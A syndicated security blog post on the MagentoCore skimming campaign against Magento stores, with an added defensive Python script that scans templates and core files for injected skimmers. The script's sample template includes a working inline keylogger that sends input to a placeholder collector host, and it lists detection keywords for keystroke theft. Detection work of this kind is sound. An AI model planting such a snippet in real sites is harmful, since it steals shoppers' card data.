MagentoCore: the Most Aggressive Skimmer Infects 60 Stores per Day

Security researcher Willem de Groot recently unearthed the most successful (so far) skimming campaign, at the center of which is the MagentoCore skimmer. The skimmer has already infected 7,339 Magento stores in the last 6 months, thus becoming the most aggressive campaign discovered by researchers.

The operators of MagentoCore managed to compromise thousands of e-commerce websites running on Magento, injecting the card scraper in their source code.

MagentoCore Skimmer: Who Is Targeted?

Apparently, the victims of this skimming malware include multi-million-dollar, publicly traded companies. This suggests the campaign is financially quite successful, but it is the customers of these companies whose cards and identities are stolen.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the parasite during the full past 6 months. The group hasn’t finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks”, the researcher said.

MagentoCore Skimmer: How Does It Work?

First, the attackers gain access to the control panel of the targeted e-commerce website, in most cases by brute-forcing the password. Once the password is cracked and the threat actor is in, a piece of JavaScript is embedded in the site's HTML template.

The script (backup) records keystrokes from unsuspecting customers and sends everything in real time to the MagentoCore server, which is registered in Moscow, the researcher found.

The MagentoCore skimmer also contains a recovery mechanism: it adds a backdoor to cron.php so that the malware periodically downloads malicious code, which deletes itself after running and leaves no traces.
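The two footholds described above, a script injected into the HTML template and a modification to cron.php, are both things a store operator can check for. The following is an added example (not code from the original post or from the researcher's tooling) showing two defender-side checks: flagging script tags that load from hosts outside the store's own allowlist, flagging inline scripts that combine keystroke handlers with outbound requests, and comparing core PHP files against a known-clean hash baseline. The HTML fragment, the allowlisted hosts and the placeholder domains are all constructed for the example and are not the campaign's real indicators.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: a Magento-style template fragment with one legitimate
# external script, one same-origin script, one injected third-party script tag
# and one inline keylogging snippet. All domains are placeholders.
SAMPLE_TEMPLATE = """
<head>
<script src="https://cdn.example/lib.js"></script>
<script src="/static/app.js"></script>
<script type="text/javascript" src="//skimmer-placeholder.example/js/mage.js"></script>
<script>
document.addEventListener('keyup', function(e){
  var i = new Image();
  i.src = 'https://collector-placeholder.example/?d=' + encodeURIComponent(e.target.value);
});
</script>
</head>
"""

# Assumption: the hosts this store legitimately serves scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.I | re.S)

# Heuristics: a keystroke/input hook plus a way to send data off-site.
KEYLOG_HINTS = ("keyup", "keydown", "keypress", "oninput", "addEventListener")
EXFIL_HINTS = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image", ".src =", ".src=")


def script_host(src):
    """Hostname of a script src; None for same-origin relative paths."""
    return urlparse(src).hostname


def find_external_scripts(html, allowed_hosts):
    """Return (host, src) for every script loaded from a non-allowlisted host."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = m.group(1)
        host = script_host(src)
        if host is not None and host.lower() not in allowed_hosts:
            hits.append((host.lower(), src))
    return hits


def find_suspicious_inline(html):
    """Return the leading text of inline scripts that both hook keystrokes and send data out."""
    hits = []
    for m in INLINE_SCRIPT_RE.finditer(html):
        body = m.group(1)
        if any(h in body for h in KEYLOG_HINTS) and any(h in body for h in EXFIL_HINTS):
            hits.append(body.strip()[:80])
    return hits


def hash_baseline(files):
    """Map path -> SHA-256 of content; record this while the store is known clean."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in files.items()}


def changed_files(baseline, current):
    """Paths whose content hash differs from the baseline, or that were added since."""
    now = hash_baseline(current)
    return {p for p, h in now.items() if baseline.get(p) != h}


# Constructed sample: a clean snapshot of two core files, then a copy of
# cron.php with an appended line standing in for an injected backdoor.
CLEAN_FILES = {
    "cron.php": "<?php\nrequire __DIR__ . '/app/bootstrap.php';\n",
    "index.php": "<?php\nrequire __DIR__ . '/app/bootstrap.php';\n",
}
BASELINE = hash_baseline(CLEAN_FILES)
CURRENT_FILES = dict(CLEAN_FILES)
CURRENT_FILES["cron.php"] += "// constructed: placeholder for an appended backdoor line\n"

if __name__ == "__main__":
    print("external scripts:", find_external_scripts(SAMPLE_TEMPLATE, ALLOWED_SCRIPT_HOSTS))
    print("suspicious inline:", find_suspicious_inline(SAMPLE_TEMPLATE))
    print("changed core files:", changed_files(BASELINE, CURRENT_FILES))
```

In practice the template check runs over the rendered checkout page (or the template files on disk) and the hash baseline is taken from a fresh, trusted Magento install and re-checked on a schedule; any hit on cron.php or a non-allowlisted script host is worth an incident ticket rather than a silent cleanup, since the post notes the skimmer re-installs itself.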

More technical details:

– The file clean.json (backup) is in fact PHP code which is (Read more...)

*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum | authored by Milena Dimitrova. Read the original post at: